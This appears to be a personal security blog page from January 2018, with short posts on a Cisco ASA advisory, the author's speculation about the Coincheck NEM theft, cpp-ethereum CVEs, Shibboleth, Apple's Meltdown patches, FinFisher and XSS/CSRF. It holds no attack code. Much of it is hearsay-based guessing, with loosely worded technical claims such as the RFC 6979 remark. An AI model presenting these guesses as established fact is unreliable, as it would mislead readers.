Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability

Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability (below url for reference)

severity level – critical

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1

We heard denial of service vulnerability to UTM firewall device in frequent. It looks that there is no any strange or feeling surprise. However similar XML Exploit method not new, it announced in RSA conference on 2016. The concept idea shown as below:

MS XML Exploit

1. Double free memory vulnerability in MSXML3.dll

2. Invokable with IE

3. Validating DTDs (Document Type Defintion) in an XML document

4. Invalid forward ID references

5. Memory occupied by a forward reference object is freed twice

6. Present in older heap manager used

Doubt – $530 million cryptocurrency heist

As we know the most common cryptocurrencies are Bitcoin, Ethereum,Ethereum Classic, Monero, Litecoin, OmiseGO, Ripple & Zcash. Fundamentally NEM Smart Asset System more secure than bitcoin. The NEM Blockchain utilizes a Proof-of-Importance calculation (rather than Bitcoin’s Proof-of-Work or PIVX’s Proof-of-Stake) to accomplish accord through a procedure that boosts dynamic support in the system. NEM is a peer-to-peercryptocurrency and blockchain platform launched on March 31, 2015. But the value of each coin is underestimation. Why hacker target to NEM. Do you think hacker willing to engage hacking in difficult way ?

Information update on 29th Jan 2018 – CNN claimed that this cryptocurrency heist is the biggest amount. Such huge value of financial lost wasn’t happened before! See below url for reference.

http://money.cnn.com/2018/01/29/technology/coincheck-cryptocurrency-exchange-hack-japan/index.html

Another reference:

My speculation – How’s coincheck loses ¥58 billion dollars value of cryptocurrency

My speculation – How’s coincheck loses ¥58 billion dollars value of cryptocurrency

Incident background:

Japan-based company said hackers broke in at 02:57am local time on Friday (12:57pm EST on Thursday, 25 January).

Financial lost: ¥58 billion dollars value of cryptocurrency

Cryptocurrency type: NEM (XEM)

Victim: coincheck.com

Cyber attack historical incident record

The most recent cryptocurrency heist happened on February 2014. The victim firm is Mt. Gox. A bitcoin exchange in Japan. The heist value amount less than ¥48 billion. Coincheck started in August 2014 and is operated by Coincheck, inc. Similar of incident did not happen in past.

Coincheck current cyber defense mechanism

Coincheck provides Two-Factor Authentication and Cold Storage.

Remark: Cold storage in the context of Bitcoin refers to keeping a reserve of Bitcoins offline. Methods of cold storage include keeping bitcoins: On a USB drive or other storage media. On a Paper wallet.

Coincheck follow JBA’s guidelines to ensure customers can have use coincheck’s services in secure (For more details, please see below url for reference).

http://jada-web.jp/wp-content/uploads/2015/01/SummaryofGuidelinesforJADA_v1-0_20141023.pdf

Secure Random Number Genaration – Customer don’t need to worry about vulnerability because coincheck’s wallet use RFC6979, a secure way for generating random numbers.

Remark: RFC 6979 makes ECDSA DPA vulnerable at 2 levels.

  • Control all in first step of RFC, except x which is the secret key K=HMAC_K(V || 0x00 || int2bytes(x) || bits2bytes(h1))
  • s = kinv (h + r.d): kinv is not known but always fixed for the same input

Key factor found on this incident

Yusuke Otsuka, Chief Operating Officer of Coincheck, said the stolen funds were kept in an online ‘hot wallet’ as opposed to a much more secure offline ‘cold wallet.’ However the officical spokeman says that bitcoins are to be stored offline when they are not being traded. Meanwhile CEO Koichiro Wada said its bitcoins were indeed stored offline but that the more than 5 million NEM coins that were stolen were not.

Observation:

According to the NEM (XEM) platform architecture (refer to above diagram) and the statement provides by the CEO (see below). A hints bring my attention to their company internal network. See whether is there insider threat happen in their office?

Quote: “bitcoins were indeed stored offline but that the more than 5 million NEM coins that were stolen were not.”

Speculation:

It looks that implant malicious code then infiltrate malware to the distributed ledge system not easy to success. Since two factor authentication has been implemented. And therefore each transaction will be acknowledged on both parties (bitcoin exchange and end user). May be you can say hacker can counterfeit the SMS message by SS7  flaw. However such huge amount of transaction will be waken support staff.  So I believe that the cyber incident happen this time may have following possibilities.

  1. Phishing email embedded web site cross site scripting and CSRF token is a popular way to stolen the user credential.
  2. Admin console or workstation encountered malware infection.
  3. A Zero day encountered on their open source application.

Summary:

Above assumption is my speculation on hearsay evidence and headline news. Let’ me keep my eye open and provide the status update to you guys afterwards.

Reference – information update on 28th Jan 2018

https://www.japantimes.co.jp/news/2018/01/27/national/cryptocurrency-exchange-coincheck-loses-58-billion-hacking-attack/

https://www.reuters.com/article/us-japan-cryptocurrency/hacked-tokyo-cryptocurrency-exchange-to-repay-owners-425-million-idUSKBN1FH03D

Information update on 29th Jan 2018 – CNN claimed that this cryptocurrency heist is the biggest amount. Such huge value of financial lost wasn’t happened before! See below url for reference. As we know the most common cryptocurrencies are Bitcoin, Ethereum,Ethereum Classic, Monero, Litecoin, OmiseGO, Ripple & Zcash. Fundamentally NEM Smart Asset System more secure than bitcoin. The NEM Blockchain utilizes a Proof-of-Importance calculation (rather than Bitcoin’s Proof-of-Work or PIVX’s Proof-of-Stake) to accomplish accord through a procedure that boosts dynamic support in the system. NEM is a peer-to-peercryptocurrency and blockchain platform launched on March 31, 2015. But the value of each coin is underestimation. Why hacker target to NEM. Do you think hacker willing to engage hacking in difficult way ?

http://money.cnn.com/2018/01/29/technology/coincheck-cryptocurrency-exchange-hack-japan/index.html

Data Privacy Day 2018 Livestream on 28th Jan 2018

In last hundred years, the record of information includes storage of information without big changes. A revolution appears enforce computer technology jump to another generation computer world with big data and digitization technology. Cyber attack wreak havoc recently. In order to avoid any mistake given by antivirus program. The antivirus vendor enforce their defensive technique. They keep track your daily activities simultaneously. Perhaps you and me do not empower to 3rd party doing similar of jobs. But what we can do today protect your personal data privacy?

The Data Privacy Day 2018-Live From LinkedIn. Data Privacy Day 2018 Livestream on 28th Jan 2018 (see below url for reference)

https://staysafeonline.org/dpd18-live/

 

 

 

cpp-ethereum vulnerabilities do not ignore!

Preface:

The cyber attack wreak havoc today. Perhaps system applications and operation system hard to avoid vulnerability occurs because of short development cycle. Crypto currency might change the financial world. However there are more and more topics are under development.

Technology background

Ethereum is an open software platform based on blockchain technology that enables developers to build and deploy decentralized applications.

What language is Ethereum written in?

There are four official reference implementations available (see below)

Golang, C++, Python and  Java

The non-officially but fully working program language are Rust, Ruby, JavaScript and Solidity. However there are design limitation occurs on Golang which causes software developers decide not to use.

Why “Go” language not have been chosen by software program developers?

The question about generics in Go is years old, and has been discussed up and down and forth and back across the Go forums, newsgroups, and email lists. However Go is a language with an intentionally restricted feature set; one of the features that Go leaves out being user-defined generic types and functions.

In short, it looks that Go language lack of traditional program language flexibility. Perhaps Go (Golang) libraries work best for scientific computing. A comment consensus is that Go might evolve into the perfect high performance computing language for scientific use. And therefore programming developer prefer to make use of other programming language.

However cyber world similar a dangerous zone. The operation system, application and hardware are difficult to avoid their design weakness (vulnerabilities). The situation sounds like a cancer in Human body. The cancer evoluted by a normal human being cell.

There are vulnerabilities found on cpp-ethereum last year end. A status update released on 18th Jan 2018.

Should you have interest of this topic, please find below details for reference.

An exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12113

An exploitable unhandled exception vulnerability exists in multiple APIs of CPP-Ethereum JSON-RPC. Specially crafted JSON requests can cause an unhandled exception resulting in denial of service.

https://nvd.nist.gov/vuln/detail/CVE-2017-12119

An exploitable improper authorization vulnerability exists in miner_setGasPrice API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12116

An exploitable improper authorization vulnerability exists in miner_setEtherbase API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12115

An exploitable improper authorization vulnerability exists in admin_addPeer API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12112

An exploitable improper authorization vulnerability exists in admin_peers API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12114

An exploitable improper authorization vulnerability exists in miner_stop API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12118

An exploitable improper authorization vulnerability exists in miner_start API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12117

An exploitable information leak/denial of service vulnerability exists in the libevm (Ethereum Virtual Machine) `create2` opcode handler of CPP-Ethereum. A specially crafted smart contract code can cause an out-of-bounds read leading to memory disclosure or denial of service.

https://nvd.nist.gov/vuln/detail/CVE-2017-14457

Summary:

There were 40,135 transactions on Ethereum blockchain on 5/17/2017. On January 25, 2018 Ethereum now is a bit over $1050. Perhaps of the crypto currency value it will lure the interest of the hacker. As usual another vulnerabilities or zero day cyber attacks might happen later on. So make sure that you have remediation and mitigation procedure if your Ethereum back-end is develop by C++.

 

CVE-2018-0486 Staying alert with your single sign-on application especially IDP vulnerability

CVE-2018-0486: Shibboleth(SAML IDP) open source vulnerability is currently awaiting analysis. For more details, see below url for reference:

https://nvd.nist.gov/vuln/detail/CVE-2018-0486

During my penetration test engagement in past. I was surprised that no matter airline , financial and retail industries web online application solutions are deployed open source single-sign on resources. An incident occurred in Equifax which awaken the business world that open source application has potential inherent risk. It will jeopardize your firm reputation. It looks that a very popular SAML IdP open source has vulnerability occurs. What is your comment? Remark: You can also find the details on attached picture diagram.

Apple enforce Meltdown and Spectre vulnerabilities remediation

About Apple security updates announcement (see below url for reference)

https://support.apple.com/en-us/HT208463

About security updates announcement, the objectives is going remediate multiple vulnerabilities.As usual, apple released security update but no descriptions are available yet. Perhaps without detail information provided by vendor (Apple). However I  was speculated  that the remediation step will be focus on the following protection technique. ARM (Protection Unit (PU))

The advantages of this system are:

• Access control held entirely on-chip (no need for any off-chip tables)

• Provides four levels of access control, cache and write-buffer control

• Separate control over instruction and data caches.

The disadvantages are:

• Small number of regions

• Restrictions on region size and alignment.

As a result,  the 3rd party unmanaged apps especially game might have problem occurs!

Lawful interception – How’s your personal privacy value today?

Cloud computer platform looks like a fight carrier in the data world. Meanwhile, the data stored inside the cloud are under cloud protection. However different country implement different data protection law and data custodian policy. Perhaps development countries unaware this topics last decade. However big data upgrade his political position progressively. It looks that government enforcement unit not easy get the data in cloud farm easier. At least they must apply the key escrow or search warrant through official channel. Or you may say sometimes ask president approval can evade all the official channel. But how to monitor billion of mobile phones & computers? Perhaps it is not a secret, wikileak became a whistleblower since 2014 (see below url for reference). A strange issue draw my attention this year? There are more antivirus vendor detected finfisher malware this month (see attached detail in picture left hand corner).FinFisher customers include law enforcement and government agencies in the world. Do you think there is a new round of hostile country surveillance program being engaging at this year?

2014 – wikileaks SpyFiles 4

https://wikileaks.org/spyfiles4/index.html

2014 – Wikileaks releases FinFisher files to highlight government malware abuse (by theguardian.com)

https://www.theguardian.com/technology/2014/sep/16/wikileaks-finfisher-files-malware-surveillance

 

Smart City & IoT -Mandatory 3 principles for working with Big data

We frequently heard smartcity project and usage of big data. Such key terms for the 1st impression to people is that it is a advanced technique and techology trend in future. In fact it was not possible to say we are keen to enjoy the benefits of smart city and big data analytic but we just ignore the peripherals. How does a city approiate to do such setup on start from strach situation. For example HKSAR issued the smart City blue print mid of last year. But it got whole bunch of unkown answer waiting for queries(public or quires with industries)? Perhaps the objectives of smart city goal to ehance public safty and governance of the city. The career oppuntunities is the side products which carry by this project. If the key items of city not been resolve yet. For instance: population, immigation policy and land use. Even though you enforce this project it may far away from their original design objectives.

Below url is the smart city blueprint for HKSAR for your reference.

https://www.smartcity.gov.hk/blueprint/HongKongSmartCityBlueprint_e-flipbook_EN/mobile/index.html#p=30

Staying alert with CSRF and XSS vulnerabilities

Perhaps there are a lot of vulnerabilities sometimes will be ignored. Why? For instance cross-site scripting will be occurred on client or server side. If there is a cross-site scripting (XSS) vulnerability in the web application, it is not possible to prevent CSRF (cross site request forgery) since the cross site scripting will allow the attacker to grab the token and include the token with a forged request. However cross-site scripting (XSS) and CSRF are only the medium risk rating vulnerability in app scan definitions. As a result it couldn’t draw the software developers attention. OnePlus Confirms Credit Card Breach Impacted Up to 40,000 Customers. A security expert found that Oneplus exploiting Magento eCommerce platform. Magento found XSS and CSRF vulnerabilities last year on May 2017. The patch released on Sep 2017. Do you think XSS and CSRF are the culprit  of this credit card data breach incident? For more details about OnePlus credit card data breach incident status update. Please refer below url for reference.

OnePlus Confirms Credit Card Breach Impacted Up to 40,000 Customers

Remark: Magento is an open source platform that provides merchants with control over their online stores and a shopping cart system, as well as tools to improve the visibility and management of the shop.